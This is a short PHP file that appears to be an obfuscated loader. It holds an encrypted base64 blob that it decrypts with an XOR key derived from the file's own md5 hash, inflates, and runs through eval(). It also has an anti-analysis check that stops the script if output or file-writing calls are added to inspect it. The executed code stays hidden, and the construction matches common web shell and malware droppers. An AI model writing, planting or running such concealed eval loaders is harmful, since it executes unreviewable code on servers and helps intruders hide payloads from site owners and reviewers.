<?php
$jwululb="b56865c84bda328726f8430c54f8d4b4";
$mskdfo="57050459000d575b0c545205500501000054570856500402050c525d06035556";
$ptdnodmmwz="eH7za/QIIJitQS7YLVPKCQ7qZSH27t4s1QmCok77mdz7s9KmjbIzbLmmskBPBTE+ySN321jGfXpjIkzmxF1S7M/75MTPD+KGmezbGyltuUKkYL46OXhIPo+wVw6iDtdgEg+TzAilBVf62sZuKPfJw0NwOiAcX5lRPZZVDc+Pzaz/O0WQY2cDzwiJngj104hYMLMXvjH5dmeoT2dbkQC4pzI=";
$ueorupgtyowp=file_get_contents(__FILE__);
$wjykhkqlsvh=str_replace($ptdnodmmwz,"",$ueorupgtyowp);
if(strpos($wjykhkqlsvh,"ec"."ho")!==false||strpos($wjykhkqlsvh,"pr"."int")!==false||strpos($wjykhkqlsvh,"var_"."dump")!==false||strpos($wjykhkqlsvh,"file_put_"."contents")!==false||strpos($wjykhkqlsvh,"fw"."rite")!==false){die();}
$mxeyva=str_replace(array($jwululb,$mskdfo),array("SP_42899dff","KP_e1c6176b"),$ueorupgtyowp);
$tknyeuvgkff=md5($mxeyva);
$fmujgsdhxhar=hex2bin($mskdfo);
$yobfdekasv="";
$rnbqbqgfjczv=strlen($tknyeuvgkff);
for($xuvxtgarm=0;$xuvxtgarm<$rnbqbqgfjczv;$xuvxtgarm++){
    $yobfdekasv.=chr(ord($fmujgsdhxhar[$xuvxtgarm])^ord($tknyeuvgkff[$xuvxtgarm]));
}
$ggdlffjquv=base64_decode($ptdnodmmwz);
$smwwyf=strlen($ggdlffjquv);
$xrfrlmn="";
$alltnxatskio=strlen($yobfdekasv);
for($xuvxtgarm=0;$xuvxtgarm<$smwwyf;$xuvxtgarm++){
    $xrfrlmn.=$ggdlffjquv[$xuvxtgarm]^$yobfdekasv[$xuvxtgarm%$alltnxatskio];
}
$cbbnvqpa="gz"."in"."fl"."ate";
eval($cbbnvqpa($xrfrlmn));
